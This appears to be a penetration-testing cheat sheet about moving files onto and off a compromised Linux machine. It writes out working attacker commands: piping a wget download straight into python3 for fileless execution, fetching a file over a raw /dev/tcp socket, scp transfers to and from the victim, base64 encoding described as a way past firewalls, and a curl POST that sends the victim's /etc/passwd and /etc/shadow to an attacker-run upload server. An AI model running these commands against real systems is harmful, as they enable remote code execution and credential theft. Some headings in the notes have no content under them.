Transferring files techniques - Linux
Replicating client-server
1. Setting up a server in the attacking machine
2. Download files from victim's machine
wget
curl
Fileless downloads using Linux
Because of the way Linux works and how pipes operate, most of the tools we use in Linux can be used to replicate fileless operations, which means that we don't have to download a file to execute it.
Fileless Download with cURL
Fileless Download with wget
wget -qO- https://raw.githubusercontent.com/juliourena/plaintext/master/Scripts/helloworld.py | python3
Bash downloads
On the server side (attacking machine), setup a server by using one of the methodologies applied above.
On the client side (victim's machine):
# Connecting to the Target Webserver (attacking machine serving the file)
exec 3<>/dev/tcp/$ip/80
# Requesting the file to the server
echo -e "GET /file.sh HTTP/1.1\n\n">&3
# Printing the Response
cat <&3
SSH downloads and uploads: SCP
SSH implementation comes with an SCP utility for remote file transfer that, by default, uses the SSH protocol.
Two requirements:
- we have ssh user credentials on the remote host
- ssh is open on port 22
On the server's side (attacker's machine):
# Enable the service
sudo systemctl enable ssh
# Start the server
sudo systemctl start ssh
# Check if port is listening
netstat -lnpt
From the attacker machine too:
# Download file foobar.txt saved in the victim's machin. Command is run from attacker machine connecting to the remote host (victim's machine)
scp username@$IPvictim:foobar.txt /some/local/directory
# Upload file foo.txt saved in attacker machine into the victim's. Command is run from attacker machine connecting to the remote host (victim's machine)
scp foo.txt username@$IPvictim:/some/remote/directory
Base64
To avoid firewall protections we can:
1. Base64 encode the file:
2. Copy the base64 string, go to the remote host and decode it and pipe to a file:
echo -n "Looooooong-string-encoded-in-base64" | base64 -d > file.php
# -n: do not output the trailing newline
Web upload
We can use uploadserver.
# Install
python3 -m pip install --user uploadserver
# As we will use https, we will create a self-signed certificate. This file should be hosted in a different location from the web server folder
openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server'
# Start the web server
python3 -m uploadserver 443 --server-certificate /location/different/folder/server.pem
# Now from our compromised machine, let's upload the `/etc/passwd` and `/etc/shadow` files.
curl -X POST https://$attackerIP/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure
# We used the option --insecure because we used a self-signed certificate that we trust.
Backdoors
See reverse shells, bind shells, and web shells.
Last update: 2023-07-15 Created: July 5, 2023 16:04:22